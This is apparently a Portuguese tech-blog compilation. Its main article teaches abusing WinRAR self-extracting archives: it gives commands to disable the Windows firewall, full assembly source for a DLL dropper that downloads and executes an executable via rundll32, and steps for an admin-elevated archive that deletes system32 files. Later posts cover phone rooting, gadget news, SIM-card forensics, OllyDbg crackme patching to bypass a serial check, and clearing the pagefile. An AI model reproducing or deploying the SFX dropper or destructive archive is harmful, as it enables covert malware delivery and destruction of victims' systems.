Burlando sistemas utilizando pacotes SFX

Basicamente um SFX é um pequeno aplicativo que contém arquivos compactados. Pode ser compactados como ZIP ou RAR, a única diferença é que quando você executar o SFX, ele automaticamente irá extrair os arquivos. No entanto, se você adicionar alguns parâmetros, você pode executá-los após a extração ou executar um comando shell antes da extração.

 

As características que nos interessa no SFX são estas:

 

 

No primeiro campo de entrada você pode adicionar um nome de arquivo que já existe na unidade atual ou um dos arquivos extraídos para executar após a extração. No segundo campo de entrada você pode adicionar um nome de arquivo que já existe na unidade atual para executar antes da extração.

 

Execução básica do Windows Shell Command dentro SFX

No primeiro campo, digite este comando:

%SYSTEMDRIVE%\windows\system32\cmd.exe /k shutdown -s -f -t 3600

Agora se gerar este pacote SFX e em seguida executá-lo, irá desligar o computador daqui 1 hora. Brincadeiras old school a parte, observe que você pode fazer com que qualquer outro aplicativo presente no sistema se execute:

%SYSTEMDRIVE%\windows\notepad.exe c:\shtext.txt

Este acima abre um documento de texto no notepad, e já o cria na unidade C com o nome de shtext.txt, bacana não é?.

netsh firewall set opmode disable

Este outro acima desativa o firewall do sistema.

%SYSTEMDRIVE%\Program Files\Internet Explorer\iexplore.exe http://securityhacker.org/

Este outro abre um site usando o Internet Explorer (neste caso você pode usar outro navegador lembrando que deve estar instalado no sistema). E com esta sintaxe você pode rodar diversos comandos ou programas.

 

Algo mais sorrateiro

Esta é uma prova de que usando apenas uma dll pequena no pacote SFX, podemos baixar e executar um aplicativo (que pode ser um vírus ou não).

Para executar esta operação iremos usar:

– O famoso Rundll32 aplicativo da Microsoft, um pequeno aplicativo usado para executar funções DLL de um programa externo. Ele será chamado pelo SFX.
FASM Compiler (Assembler Flat), eu escolhi este compilador, pois é muito fácil de usar e rápido (baixe no site http://flatassembler.net/) ele será usado para criar a nossa dll downloader.

Agora com o FASM já instalado em seu computador, crie uma pasta vazia e crie um arquivo qualquer com o nome de “suadll.asm“. Quando terminar isto, abra o FASM e nele abra este arquivo que acabou de criar, no FASM, neste arquivo, cole o seguinte código:

;-------------------------------
; SFX Downloader via RunDLL32
; Feito por Spo0k3r
; securityhacker.org
;-------------------------------
 
format PE GUI 4.0 DLL
entry DllEntryPoint
 
include 'win32a.inc'
 
;-- rw
section '.data' data readable writeable
 
CMD_OPEN db 'open',0
url db 'http://siteparadownload.org/executavel.exe',0
output db 'c:\\executavel.exe',0
errmsg db 'ERROR',0
errtitle db '',0
okmsg db 'OK',0
oktitle db '',0
 
section '.text' code readable executable
 
proc DllEntryPoint hinstDLL, fdwReason, lpvReserved
mov eax,TRUE
ret
endp
 
;-- Esta funcao ira chamar o rundll32 via SFX pela linha
proc dcscdownload
xor eax, eax
invoke URLDownloadToFile, 0, url, output, 0, NULL ; download
cmp eax, 0
jne enderr
invoke ShellExecute, 0, CMD_OPEN, output, 0, 0, SW_SHOW ; execute
jmp endok
enderr:
invoke MessageBox, 0, errmsg, errtitle,0
jmp endpr
endok:
invoke MessageBox, 0, okmsg, oktitle,0
endpr:
ret
endp
 
;-- Tabela importar exportar
section '.idata' import data readable writeable
 
library kernel,'KERNEL32.DLL',\
urlmon,'URLMON.DLL',\
Shell32,'SHELL32.DLL',\
user,'USER32.DLL'
 
import Shell32,\
ShellExecute,'ShellExecuteA'
 
import user,\
MessageBox,'MessageBoxA'
 
import urlmon,\
URLDownloadToFile,'URLDownloadToFileA'
 
section '.edata' export data readable
 
export 'OURDLL.DLL',\
dcscdownload,'dcscdownload'
 
section '.reloc' fixups data discardable

NÃO se esqueça de editar a URL e o caminho de saída.

Agora, na barra de menu clique em “Run” “Compile“. E salve na pasta que criou o dll. Após isso sua dll está pronta, agora podemos criar o SFX downloader, vamos seguir os seguintes passos:

  • Clique com o botão direito sobre a dll e vá para a opção “Adicionar para o arquivo…” no WinRAR.
  • Escolha a opção de pacote SFX na lista de opões
  • Vá para aba de Configurações Avançadas
  • Clique no botão Configurações SFX
  • No campo de entrada, adicione:
%APPDATA%\dcsc\ourdll.dll

– No primeiro parâmetro de entrada coloque esta linha

%SYSTEMDRIVE%\windows\system32\rundll32.exe %APPDATA%\dcsc\ourdll.dll, dcscdownload

Agora você pode gerar o seu arquivo, se você tiver corretamente configurar o SFX, então se você executá-lo ele irá baixar e executar o arquivo escolhido após as extrações. Confira a imagem de configuração do SFX:

 

SFX Destruição de arquivo

Como ultimo exemplo irei mostrar para vocês como destruir uma máquina inteira usando apenas opções do SFX.

O gerador de SFX inclui duas outras funções perigosas (Executar como administrador e Excluir arquivos após a extração). A opção Executar como administrador vai pedir para executá-lo como administrador, de modo que o SFX terá todos os direitos sobre o sistema e após a extração, a exclusão de arquivos será legal usar para arquivos maliciosos.

Para usar estas opções, siga os passos:

  • Crie um pacote SFX novo e vá para as opções do SFX (agora você já sabe como)
  • Nas opções SFX vá para a guia Avançado e marque a caixa “Pedido de acesso administrativo”
  • Então, na primeira entrada “Excluir arquivos”, digite a lista de arquivos que deseja excluir separados por um espaço em branco (exemplo: rundll32.exe cmd.exe hello.exe …..)
  • Agora volte para a guia geral e colocar como caminho de extração:
%SYSTEMDRIVE%\windows\system32\

E agora já pode gerar o SFX.

ATENÇÃO: É apenas um exemplo, não execute no seu computador este SFX pois poderá causar danos no sistema se você colocar arquivos a serem excluídos importantes. Se quiser testar, use uma máquina virtual com o Time Machine instalado para poder reverter os problemas causados.

Resumo rápido do que isso faz:
Basicamente, este exemplo irá excluir rundll32.exe, cmd.exe e hello.exe do system32 durante a extração.

Observe: os arquivos a serem apagados serão apenas feitos no caminho da extração, por isso que eu escolhi system32 no caminho de extração e temos que ter o direito de extrair, por isso forçar o SFX para ser executado como administrador.

 

Finalização

Bom, isto foi tudo. Espero que tenha apreciado este artigo sobre uma segurança questionável de um SFX do WinRAR. A partir de agora você percebe o quão perigoso pode ser baixar arquivos da internet pensando ser simples instaladores, o seu antivirus pode não detectar o conteúdo malicioso do SFX por ser criptografado pelo programa, é bom sempre manter um antivírus com detecção de comportamento e para isso recomendo o Comodo Internet Security, é free!

Também quero ressaltar que não sou responsável pelos danos, ou fins que você for utilizar estas dicas.

Fonte:SecurityHacker

Samsung Galaxy S3 – Root + Recovery alternativa

Há quem viva sem ter acesso root no seu smartphone. Outros há, que não dispensam o mesmo.

Os felizes possuidores de um Galaxy S3 podem recorrer ao CF-Root, desenvolvido pelo já mítico Chainfire, para instalar uma recovery alternativa (CWM) e acesso root.

O Mundo Tecnologico não se responsabiliza por eventuais problemas decorrentes da aplicação destes métodos! Se não estiverem familiarizados com a ferramenta ODIN, não experimentem!

O procedimento está em linha com o que já foi em tempos publicado para o primeiro galaxy.

Antes de tudo, têm de ter o driver do SG3 instalado. Têm duas hipóteses:

  • Driver da Samsung instalado  manualmente
  • Instalar o Samsung KIES

Se recorrerem ao KIES, não se esqueçam que devem encerrar o mesmo antes de efectuar os passos em baixo descritos!

1 – Descarregar e descompactar o ODIN;
2 – Descarregar e descompactar o CF-Root;

ATENÇÂO:  o CF-Root só deve ser descompactado uma vez. Se em vez de 1 ficheiro tiverem 3, já descompactaram uma vez a mais!

3 – Desligar o S3;
4 – Correr o ODIN e verificar que está como tudo como na imagem em baixo. Clicar em PDA e escolher o ficheiro descompactado no ponto 2.;

5 – Colocar o S3 em modo DownloadVolume-baixar + Home + Power Button; Recebemos o belo do aviso da praxe.

6 – Clicar em volume-aumentar para continuar.
7 – Atentem na imagem em baixo.
Se continuarem o processo, esta informação vai ser alterada e a garantia será(?) violada.

8 – Ligar o cabo USB ao PC. O SG3 é detectado pelo PC, e posteriormente o ODIN detecta a porta onde o SG3 se encontra ligado.

7 – Caso o SG3 tenha sido correctamente detectado, clicar em Start, caso contrário verificar a instalação do driver. No final desta fase, devem ter no ODIN algo como o apresentado em baixo.

8- O SG3 reinicia (ver check box no ODIN…) e termina o processo de instalação da recovery e root. Podem desligar o cabo USB e aguardar, sem mexer em nada

9 – Tão “simples” quanto isto.

A Samsung implementou algumas funcionalidades para  registar as alterações: reparem nas alterações face à imagem que apresentei em cima.

Como se não fosse bastante, até nas próprias definições à registo das alterações!

Fruto do trabalho do mestre Chainfire, é possível repor o contador de alterações a 0. Para voltar a ter o estado do dispositivo como normal, é preciso mais alguma ginástica. Não sei até que ponto será possível ter tudo como na forma original…

Fonte:AppAndroid

Caixa de som estilo barbatana de tubarão

A Edifier distribuiu hoje um press-release com seu novo sistema de caixas de som sem fio dotado de design bem diferente e simples, que lembra muito as barbatanas dos tubarões ou um par de chifres.

O Edifier E30 Spinnaker Stereo Speaker System vem com 6 amplificadores que alimentam dois “silk domed tweeters”, dois 2 3/4” mid-range e dois “downward firing 4” bass drivers” escondidos dentro de duas caixas de som com design abstrato e 40,6 cm de altura.

O Edifier E30 Spinnaker vem equipado com conexão sem fio Bluetooth, além de entradas ótica e auxiliar para conectar aparelhos via cabo. O sistema vem com um controle remoto em forma de cúpula com alcance de 10 metros para ajustar o volume e navegar pelas músicas.

O E30 Spinnaker Stereo Speaker System vem ainda com porta para conectar um subwoofer externo e processador de som digital DSP com 6 canais separados. A potência total é de 90 Watts (Treble: 10W x 2 Midrange: 10W x 2 Bass: 25W x 2).

O Edifier E30 Spinnaker Stereo Speaker System custa US$349,99 diretamente no site da Shop Edifier onde você também pode conferir todas as especificações técnicas.

Fonte:DigitalDrops

Keymonk Keyboard – Swype a duas mãos!

O mundo dos teclados para Android é dominado por dois pesos pesados, o Swype e o Swiftkey. Pese embora este domínio, outras aplicações têm passado aqui pelo AppsdoAndroid.
Hoje cabe a vez ao recém chegado Keymonk Keyboard.

Quando utilizado num smartphone, sou um admirador confesso do Swype. No que a tablets diz respeito, a minha escolha já é diferente. Por norma, uso a dock. Quando não o faço, recorro ao Swiftkey, bastante mais adequado às dimensões do ecrã.

 

Foi com natural curiosidade que decidi experimentar o Keymonk Keyboard, o qual é baseado no Swype.
Baseado, pergunta o estimado leitor? Sim, este Keymonk Keyboard é um Swype a duas mãos!

 

Nada melhor que um vídeo para terem um ideia (não mais que isso, acreditem) do potencial desta aplicação.

Ao testar o Keymonk Keyboard, a primeira impressão foi: fiasco total!  Decidi tentar mais algumas palavras, e ao fim de uns minutos, a coisa até começou a funcionar bastante bem. Neste momento a aplicação está limitada ao dicionário em inglês. Aguardam-se melhoramentos e outros idiomas, já prometidos para as novas versões.  Keymonk Keyboard, a seguir com atenção!

Forense em SIM CARD

A ferramenta que vamos falar hoje, alguns anos atrás, fazia mais sentido agora, porque com os novos celulares e smartphones cartão SIM tem sido relegada a segundo plano, agora praticamente só serve como interação com o operador. Agora você pode fazer-lhe a idéia de que falar sobre uma ferramenta para explorar o cartão SIM de um telefone móvel de dados. Nós vamos usar o software escrito em Python chamada pySIM.

Para isso precisamos o primeiro hardware, neste caso existem duas possibilidades, uma está comentando na web e encontrei um outro de pura sorte para mim. O software que estamos falando sobre o cartão é conectado através de um dispositivo de porta serial, também, no familiar web DealExtreme encontrar um leitor de tarjetas SIM por menos de 3€ que para funcionar necesita un driver USB-2-Serial (windows Mac OS X) e que funciona bem com pySIM leitor. E a outra opção e divertido no começo eu tinha comprá-lo e montá-lo eu mesmo, é mais caro, mas a satisfação de fazê-lo e ele funciona para alguns, é mais gratificante.

Por outro lado, para fazer o trabalho depende do sistema operacional, o Windows pode fazer o download do executável aquí, para Linux e Mac OS X necesitamos ter instalado Python, pySerial (Biblioteca para interagir com um [COM] serial e wxPhyton (bibliotecas Python para gerar ambientes gráficos), além código del programa. Para funcionar corretamente no Mac OS X, eu recomendo MacPort com Python 2.6 e instalar a partir MacPort pyserial wxPhyton e também, no meu caso contrário me deu muitos problemas.

Interfaz pySIM

Para faze-lo funcionar pode conectarlo a través de un conversor USB-Serial e abrindo a pySIM-Reader vai pedir para você dizer o dispositivo no Mac OS X e Linux, você pode passar o dispositivo criado não é o único na janela do programa, a minha solução foi fazer um ln entre o dispositivo real criada em / dev / e você reconhece o programa, se você contar-lhe directamente por cabo serial pode não ser este problema.

Creando el link al dispositivo requerido

O programa tem um grande muito, mas de alguma forma faz sentido, e que está a extrair dados do SIM deve fornecer o código SIM, de modo que só podemos extrair informações de nosso SIM ou se tiver abandonado o PIN, mas obviamente a ser o software OpenSource pode acessar o código e entender em um acesso de baixo nível para o chip.

O software permite entre outras coisas:

– Agenda:

Mostrar Agenda
modificar Agenda
Mostrar última chamada
Fazer / Restaurar Agenda de Backup

– SMS:

Mostrar SMS
Fazer / Restaurar backup SMS

– SIM:

Exibir informações do SIM (PIN não obrigatório)
Mude o seu PIN
Activar / Desactivar o PIN

O programa acessa o SIM de uma forma mais ou menos fácil de entender, as funções do SIM como uma memória de tamanho fixo (64K por exemplo) que é dividido em setores ou partes e cada parte tem permitido vários espaços de memória fixos no a informação é armazenada. Este programa, de acordo com a arquitetura RFC de um cartão SIM, você sabe que se você alcançar a posição X, N concorda em manter tal registro e um número de telefone se você chegar a X, N +1 concordar com o seguinte número de telefone armazenado. Podemos dizer que é estruturado em uma espécie de matriz.

Para aceder a esta matriz deve saber o PIN, uma vez que entre os dados e à solicitação do telefone ou o leitor há um microprocessador que é responsável pela comunicação ambos os lados.
Este programa com suas limitações pode ser interessante se por exemplo que usamos para fazer uma empresa de telefonia móvel forense que conhece o código PIN.

Eu mostro uma foto do resultado, uma vez soldado

SIM-Reader montado (clic para ampliar)

Fonte:ElRiconDelRanito

 

Case para mergulho para Iphone

Este não é o primeiro modelo, mas sim uma nova opção bem legal para quem curte fotografar até embaixo d’água. O driSuit é uma espécie de traje de mergulho especialmente criado para iPhones que permite a sua perfeita utilização nas condições mais molhadas possíveis. Seja na praia, piscina, neve, etc, o case (obviamente) 100% à prova d’água possui um visor de gel transparente para que todos os comandos da tela possam ser normalmente acessados ou seja: se o seu fôlego for bom, dá até pra fotografar e “Instagramar” debaixo d’água por exemplo! O driSuit pode ser encontrado na Photojojo por 60 dólares e eu quero muito um! “Submersamente legaus”!
Fonte:BemLegaus

Crackme, brincando con um serial e OllyDBG – Parte II

Se você se lembrar post anterior, nós estávamos falando sobre como nós poderíamos fazer com OllyDbg revertendo um binário verificado o número de série, no final, estavam ficando na memória editar e salvar o resultado para que pudéssemos entrar em qualquer série que você nos deu um resultado da série correta .

Nesta segunda parte, veremos exatamente o que faz com que o binário verifique se o número de série, apresentamos é correta ou não.

No caso de você não ter lido, quando abrimos o binário, vamos encontrar as referências da seqüência binária.

Corte novamente Esta parte da série, para ir para a parte interessante.

Agora, o que não vai resolver parte do 00401F7, onde temos a chamada e que compara eax 0.

Desta vez vamos fazer nenhuma mudança de montar. O que fazemos é colocar um ponto de interrupção. Dessa forma, quando você executar o programa e vá para verificar o número introduzido, vamos ver como ele funciona.

Colocamos um ponto de interrupção.

Executamos o programa

Fijaros nas referências e outros, então você vai ver que :D

Agora o que vamos passo a passo (instrução por instrução) para ver o que ele faz, por isso, dar o primeiro passo.

Vemos mais cordas que não tínhamos visto antes, também ver direito na caixa abaixo, existem duas seqüências, que nós nos apresentamos e outro. O que é isso string? L2C-57816784-ABEX

Bem esta é a série que estávamos procurando, por isso apresentamos o programa para verificar

UEEEE, temos o serial que você estava procurando.

Em outros momentos, vamos encontrar a criptografia de série, claro!

Fonte:FluProject

Crackme,brincando com um serial e OllyDBG

A ciência da engenharia reversa é algo que me fascinou, e que é quando você começar a entrar na questão de malware que acabam em engenharia reversa é inevitável. Também geralmente um tema que as pessoas às vezes vai um pouco perdido casos e não sabe por onde começar, mais você precisa saber linguagem assembly e nem todos estão dispostos, eu encontrei.

Quando eu comecei a olhar para o meu item no final achei melhor começar a aprender a linguagem assembly através de exercícios simples.

Antes de começar você quero agradecer ao meu Orozlan, por me ajudar todos os dias com as complexidades de malware e engenharia reversa.

No decorrer de hoje temos um programa que nos pede para inserir um serial. O programa vai verificar e nos dizer se é correto ou não. Então, nós vamos fazer é que o primeiro adesivo do programa em memória de modo que qualquer coisa que colocamos a nós como correta. E 2 de série encontrados dentro do programa.

OllyDbg precisa fazer isso, então baixá-lo aquí

Abrimos o programa que irá verificar o serial:

Nós colocamos uma série qualquer para ver como o programa se comporta, por exemplo 111111

temos o erro que mostra o programa.

Agora abra OllyDbg, e começou, se a primeira vez que você abrir OllyDbg, não se preocupe com as coisas que você não entende.

Quando abrimos OllyDbg buscar em primeiro lugar a mensagem de erro que saiu quando recebemos a série. Então olhe para todas as cadeias binárias.

Este nos devolverá os siguientes strings

Se você considerar as mensagens que dão a aplicação, podemos ver quando ele dá a mensagem que a série não é correto, e quando a mensagem de que está correto.

Agora o que fazemos é ir à festa, mas queremos que o código que estamos assistindo. Não há necessidade de compreender cada tempo de instrução.

Nós clique na linha que não, olhe a parte que mais interessado em:

Estas seriam as instruções mais básicas que nós vamos explicar um pouco para entender o que faz.

CALL: / Ir para o endereço / comando indicado

Push: Armazena o valor na pilha.

JMP: Ir para o endereço indicado.

Para começar com o que vamos fazer é corrigir o programa na memória para que nós colocamos o serial que nos colocou direito.

Então começamos:

Verificar o programa gostaria de fazer é, se a série é OK, ele mostra a mensagem de X. Se a série não é OK, mostra que outros.

Fácil ¿não?

Então o que vamos fazer é alterar a instrução que cuida disso.

Nós nos colocamos na posição 004010FF.

O que não vai mudar Ir JE se o seu oposto é saltos JNE igual, se não iguais

Nós vamos montar na posição antes de

Trocamos por

Para ser claro, isto só muda o endereço de memória, de modo que não mudará o binário original.

Mas vai ver o que fazemos, nós mudamos o valor e armazenar o binário.

Quando nos reunimos, vamos ler a

Agora, execute o programa para que você possa ver que aceita qualquer serial.

Então, pressione F9, executar o programa e entrar em qualquer série ….

UALA, temos o que queríamos.

Se você deseja salvar o binário, clique direito e fazer

Como fizemos uma mudança basta escolher a seleção. Para salvar nos salvar em arquivo e armazenar o binário

Uma vez que manter o binário, podemos executá-lo e digitar o que você nos dê OK em todos os casos

Uma vez salvo, você pode executar e testar

No próximo capítulo vai olhar para o binário serial.

Espero que tenha gostado.

Fonte:FluProject

Nova TV Samsung com sensor de movimentos trará o game Angry Birds para sua sala!

Mais uma novidade legal para os fãs de Angry Birds! A gigante Samsung anunciou uma parceria com a gigante Rovio para juntas lançarem uma versão do game Angry Birds especialmente criada para sua linha de TVs Smart Series. Os aparelhos de TV contam com sensores que reconhecem os movimentos dos usuários, assim como o sistema Kinect lançado pela Microsoft faz.

A ideia é oferecer mais uma funcionalidade interessante às TVs. Agora será possível matar porcos verdes diretamente de nossa sala de TV! Os usuários poderão operar o estilingue e arremessar pássaros apenas fazendo gestos em frente ao aparelho. O game chegará em breve à Samsung TV App Store e será compatível com os modelos ES7000, ES8000 e ES900 da linha Smart TV da empresa.

Fonte:RockNTech

O armazenamento de senhas no Pagefile.sys

Oi todos!

Pagefile.sys é o arquivo de paginação ou também conhecido como swap.

Este arquivo armazena muitos importante porque funciona como computador de memória virtual. Você pode armazenar temporariamente senhas não criptografadas programas.

Como em artigos anteriores discutem o Windows salva tudo. Então você quer me salvar, mas os dados no PC que você tem que fazer o seguinte:

Abra o editor de registro do Windows (regedit.exe).

Eu digite o seguinte caminho:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management

Uma vez que há alteração do valor chave de ClearPageFileAtShutdown, o tipo deve ser REG_DWORD eo valor de 1.

Uma vez que esses processos vão ativar os Pagefile.sys limpeza automática sempre que você desligar o computador tiver certeza de que não há senhas ou outros dados no swap.